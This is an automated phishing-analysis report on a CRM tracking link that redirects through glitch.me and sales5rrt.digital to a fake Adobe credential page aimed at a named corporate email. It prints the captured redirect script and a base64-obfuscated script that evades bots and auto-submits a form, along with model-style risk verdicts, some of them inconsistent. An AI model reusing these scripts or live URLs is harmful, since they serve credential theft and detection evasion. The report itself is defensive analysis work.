Windows Analysis Report
https://crm1.ascentismedia.com/MatrixCRM2/CommunicationsCentre/publicpages/LinkTrackers.aspx?link=https%3A%2F%2Fdenionquil.glitch.me%23Y3VzdG9tZXJzZXJ2aWNlQGRpYXRyb24uY29t&blastid=HaJwKgulsuhThrevQ-bg1A==&cc=k7ybaJOHC1q7mw3Z9UVdFw==&linkid=n6XO784zESaOPkbEOEOx87g4IWcBarkC2D1Tdl8CJciDFYwgGprfRd-XvUJO

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false,
    "reasoning": "This appears to be a legitimate CRM (Customer Relationship Management) subdomain for a company called Ascentis Media. The structure is standard with a simple subdomain 'crm1', and uses a common .com TLD. No suspicious elements are present in the URL."
}

URL: https://crm1.ascentismedia.com

{
    "risk_score": 7,
    "reasoning": "The script demonstrates high-risk behavior by using base64 decoding to extract an email address from the URL hash, and then redirecting the user to a potentially malicious domain. This behavior is consistent with a phishing or credential harvesting attack, which poses a significant security risk."
}

  function base64Decode(str) {
    try {
      return decodeURIComponent(atob(str).split('').map(function(c) {
        return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);
      }).join(''));
    } catch (e) {
      console.error('Invalid base64 string:', str);
      return null;
    }
  }

  var hash = window.location.hash;
  if (hash !== "") {
    hash = hash.substring(1); // Remove the '#' character
    const email = base64Decode(hash);

    if (email) {
      window.location.href = "https://sales5rrt.digital/archiproduct/grunenthal.html#" + (email);
    }
  }

{
    "risk_score": 9,
    "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. It attempts to execute various JavaScript environments and checks for the presence of web automation tools, likely to evade detection. The script also sets a cookie with a long expiration date, which could be used for malicious purposes. Overall, the script exhibits a high degree of suspicious and potentially malicious activity, warranting a high-risk score."
}

var _30="KGZ1bmN0aW9uKCl7CiAgICAgICAgdmFyIGEgPSBmdW5jdGlvbigpIHt0cnl7cmV0dXJuICEhd2luZG93LmFkZEV2ZW50TGlzdGVuZXJ9IGNhdGNoKGUpIHtyZXR1cm4gITF9IH0sCiAgICAgICAgYiA9IGZ1bmN0aW9uKGIsIGMpIHthKCkgPyBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgYiwgYykgOiBkb2N1bWVudC5hdHRhY2hFdmVudCgib25yZWFkeXN0YXRlY2hhbmdlIiwgYil9OwogICAgICAgIGIoZnVuY3Rpb24oKXsKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIG5vdyA9IG5ldyBEYXRlKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHZhciB0aW1lID0gbm93LmdldFRpbWUoKTsKICAgICAgICAgICAgICAgICAgICAgICAgdGltZSArPSAzMDAgKiAxMDAwOwogICAgICAgICAgICAgICAgICAgICAgICBub3cuc2V0VGltZSh0aW1lKTsKICAgICAgICAgICAgICAgICAgICAgICAgZG9jdW1lbnQuY29va2llID0gJ0xJVkVkT3U2eTlSeDk3ZDVnVWl4aWdHc1FLND0yNFY1ZmRfU3FHZnluQ3NIbUFKYmw5eVNuZEEnICsgJzsgZXhwaXJlcz0nICsgJ0ZyaSwgMTctSmFuLTI1IDA3OjAxOjMyIEdNVCcgKyAnOyBwYXRoPS8nOwogICAgICAgICAgICAgICAgICAgICAgICAvL2phdmFzY3JpcHQgcHV6emxlIGZvciBicm93c2VyIHRvIGZpZ3VyZSBvdXQgdG8gZ2V0IGFuc3dlcgogICAgICAgICAgICAgICAgICAgICAgICBpZighd2luZG93Ll9waGFudG9tIHx8ICF3aW5kb3cuY2FsbFBoYW50b20pey8qcGhhbnRvbWpzKi8KaWYoIXdpbmRvdy5fX3BoYW50b21hcyl7LypwaGFudG9tYXMgUGhhbnRvbUpTLWJhc2VkIHdlYiBwZXJmIG1ldHJpY3MgKyBtb25pdG9yaW5nIHRvb2wqLwppZighd2luZG93LkJ1ZmZlcil7Lypub2RlanMqLwppZighd2luZG93LmVtaXQpey8qY291Y2hqcyovCmlmKCF3aW5kb3cuc3Bhd24pey8qcmhpbm8qLwppZighd2luZG93LndlYmRyaXZlcil7LypzZWxlbml1bSovCmlmKCF3aW5kb3cuZG9tQXV0b21hdGlvbiB8fCAhd2luZG93LmRvbUF1dG9tYXRpb25Db250cm9sbGVyKXsvKmNocm9taXVtIGJhc2VkIGF1dG9tYXRpb24gZHJpdmVyKi8KaWYoIXdpbmRvdy5kb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuZ2V0QXR0cmlidXRlKCJ3ZWJkcml2ZXIiKSl7Ci8qaWYobmF2aWdhdG9yLnVzZXJBZ2VudCl7Ki8KaWYoIS9ib3R8Y3VybHxrb2RpfHhibWN8d2dldHx1cmxsaWJ8cHl0aG9ufHdpbmh0dHB8aHR0cmFja3xhbGV4YXxpYV9hcmNoaXZlcnxmYWNlYm9va3x0d2l0dGVyfGxpbmtlZGlufHBpbmdkb20vaS50ZXN0KG5hdmlnYXRvci51c2VyQWdlbnQpKXsKLyppZihuYXZpZ2F0b3IuY29va2llRW5hYmxlZCl7Ki8KLyppZihkb2N1bWVudC5jb29raWUubWF0Y2goL14oPzouKjspP1xzKlswLTlhLWZdezMyfVxzKj1ccyooW147XSspKD86LiopPyQvKSl7Ki8vKkh0dHBPbmx5IENvb2tpZSBmbGFncyBwcmV2ZW50IHRoaXMqLwogICAgICAgICAgICAgICAgICAgICAgICB2YXIgX181PXBhcnNlSW50KCIyMDI1MDExNSIsIDEwKSArIHBhcnNlSW50KCIxNTAxMjAyNSIsIDEwKTsKICAgICAgICAgICAgICAgICAgICAgICAgLyp9Ki8KLyp9Ki8KfQovKn0qLwp9Cn0KfQp9Cn0KfQp9Cn0KICAgICAgICAgICAgICAgICAgICAgICAgLy9lbmQgamF2YXNjcmlwdCBwdXp6bGUKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIHhodHRwID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLm9ucmVhZHlzdGF0ZWNoYW5nZSA9IGZ1bmN0aW9uKCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICh4aHR0cC5yZWFkeVN0YXRlID09PSA0KXsKICAgICAgICAgICAgICAgICBjb25zdCBmaXJzdEZvcm0gPSBkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCdmb3JtJyk7CgovLyBDaGVjayBpZiB0aGUgZm9ybSBleGlzdHMgYW5kIGlmIGl0IGhhcyBpbnB1dCBlbGVtZW50cwppZiAoZmlyc3RGb3JtKSB7CiAgY29uc3QgaW5wdXRGaWVsZHMgPSBmaXJzdEZvcm0ucXVlcnlTZWxlY3RvckFsbCgnaW5wdXQnKTsKICAKICBpZiAoaW5wdXRGaWVsZHMubGVuZ3RoID4gMCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZG9jdW1lbnQuZm9ybXNbMF0uc3VibWl0KCk7CiAgfSBlbHNlIHsKICAgICAgICAgICAgICAgICAgIGlmICghd2luZG93LmxvY2F0aW9uLmhhc2gpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5ocmVmID0gd2luZG93LmxvY2F0aW9uLmhyZWY7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5yZWxvYWQoKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICB9Cn0gZWxzZSB7CiAgICAgICAgICAgICAgICAgaWYgKCF3aW5kb3cubG9jYXRpb24uaGFzaCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLmhyZWYgPSB3aW5kb3cubG9jYXRpb24uaHJlZjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlbG9hZCgpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQp9CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgICAgICB9OwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5vcGVuKCJQT1NUIiwgIi9hcmNoaXByb2R1Y3QvZ3J1bmVudGhhbC5odG1sIiwgdHJ1ZSk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ3lNc0YwWFExVjR2NU5UQlpMSDJ3TzJtWlZCYyc

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a legitimate implementation for pre-populating an email input field with a value from the URL hash. This is a common practice for improving user experience, such as in password reset or email verification flows. While the code uses some basic DOM manipulation, it does not exhibit any high-risk behaviors like dynamic code execution, data exfiltration, or obfuscation. The overall risk is low, as the script is likely serving a legitimate purpose."
}

document.addEventListener("DOMContentLoaded", function() {
    // Get the email from the URL hash
    var email = window.location.hash.substr(1); // Remove the '#' character

    // Set the email value to the input field
    document.getElementById("email").value = email;

    // Replace placeholder with the actual email
    document.getElementById("email").value = document.getElementById("email").value.replace("[[Email]]", email);
});

{
"contains_trigger_text": true,
"trigger_text": "File protection is enabled. Confirm recipient email and password to continue.",
"prominent_button_name": "View Document",
"text_input_field_labels": [
"customerservice@diatron.com",
"Password"
],
"pdf_icon_visible": true,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": true,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false,
    "reasoning": "The URL contains suspicious elements including: a non-standard TLD (.digital), random characters in the domain name (5rrt), and the use of 'sales' which is often associated with phishing attempts. The .digital TLD is less common and often used in malicious campaigns."
}

URL: https://sales5rrt.digital

{
  "brands": [
    "Adobe"
  ]
}

```json{  "legit_domain": "adobe.com",  "classification": "wellknown",  "reasons": [    "The brand 'Adobe' is well-known and typically associated with the domain 'adobe.com'.",    "The URL 'sales5rrt.digital' does not match the legitimate domain 'adobe.com'.",    "The domain 'digital' is unusual for Adobe and could indicate a phishing attempt.",    "The presence of an email input field with a non-Adobe domain 'diatron.com' is suspicious.",    "The URL contains no direct reference to Adobe, which is a red flag for phishing."  ],  "riskscore": 9}
Google indexed: False